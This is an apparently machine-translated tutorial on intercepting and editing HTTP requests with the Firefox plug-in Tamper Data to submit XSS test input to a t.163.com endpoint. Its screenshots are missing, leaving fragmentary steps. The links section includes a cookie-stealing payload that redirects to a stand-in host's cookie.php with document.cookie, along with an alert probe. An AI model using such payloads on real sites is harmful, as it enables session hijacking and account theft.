Use Tamper Data to submit XSS attack Data

Source: Internet
Author: User

Use Tamper Data to submit XSS attack Data 1. Introduction

As a Firefox plug-in, Tamper Data is easy to use and powerful. It can be used to view and modify HTTP/HTTPS headers and POST parameters and model web attacks; tracking HTTP requests and responses and recording time;

Ii. Use

Tamper provides request monitoring and modification functions

2.1 request listening

The tool page is divided:

Monitoring window:

All HTTP requests sent from the web page opened by firefox tabs and their corresponding responses will be monitored by Tamper Data (default status)

The window in the lower left corner shows the header information of each request. Similar to Firebug.

The window in the lower-right corner shows the returned header information for each request, similar to Firebug. The details returned by the request are displayed by right-clicking the http request-view source.

Note: The Filter can only display requests for the specified domain name.

2.2 Request Interception

After you click Start Tempar, the window will pop up:

Click Tamper:

Right-click a request and add a new request parameter and request header, right-click the parameter name, and a menu is displayed, including the xss/SQL/data Option and xss has a pre-defined xss script. Or directly modify the value corresponding to the parameter. Click OK to submit the request.

XSS attack example

For interface, Custom Skin: http://t.163.com/user.do? Action = updateUserConfig for illegal data submission (xss)

Start Tamper and click Save on the page.

Pop-up window:

"Tamper" Operation:

To:

After submission:

The server returns 555. Illegal data submission is prohibited in the background.

Principle:

Iii. Tamper Option

Image Blocking is not supported by default. You can enable it in Option. You can also add custom data to the Context Menu.

 

 

Iv. Introduction to XSS

Discussion on the Application of reflective XSS in http://www.bkjia.com/Article/201006/51228.html

Http://www.bkjia.com/Article/200811/30675.html XSS attack based on CSRF

Http://www.bkjia.com/Article/200810/30105.html Anehta -- Boomerang (rollback), how to turn reflected XSS into persistent XSS: on cross-origin get cookie

Http://www.bkjia.com/kf/200611/15445.html XSS attack Cookie spoofing hiding JavaScript Execution

Http://t.163.com/nathanliu! Javascript: alert (document. cookie); If the url contains such a script: document. location = 'HTTP: // URL.com/cookie.php? Cookie = '+ escape (document. cookie)

4 --- Cross-Site Scripting (XSS) CSRF http://www.bkjia.com/Article/201212/178487.html [WebGoat notes]

XSS attack http://baike.baidu.com/view/2161269.htm

Common xss attack symbols:

[1] <> (angle brackets)

[2] "(quotation marks)

[3] '(single quotes)

[4] % (percent sign)

[5]; (semicolon)

[6] () (parentheses)

[7] & (& Symbol)

[8] + (plus sign)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.